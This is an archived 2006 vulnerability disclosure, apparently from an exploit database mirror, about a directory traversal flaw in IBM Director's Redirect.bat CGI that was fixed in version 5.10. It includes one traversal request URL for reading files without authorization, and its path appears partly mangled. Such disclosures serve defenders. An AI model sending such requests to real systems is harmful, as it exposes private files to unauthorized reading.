[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IBM Director < 5.10 (Redirect.bat) Directory Transversal Vulnerability
# Published : 2006-09-07
# Author : Daniel Clemens
# Previous Title : RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit
# Next Title : TIBCO Rendezvous <= 7.4.11 (add router) Remote BOF Exploit


There is a vulnerability within the Redirect.bat file on a ibm director
cgi which allows a directory transversal to take place which in turn
exposes most files on the system to be read without authorization.

http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..................program%20filesibmdirectorversion.key (or insert evil file here)


This was fixed in the 5.10 version of ibm director.

-Daniel Clemens

# www.Syue.com [2006-09-07]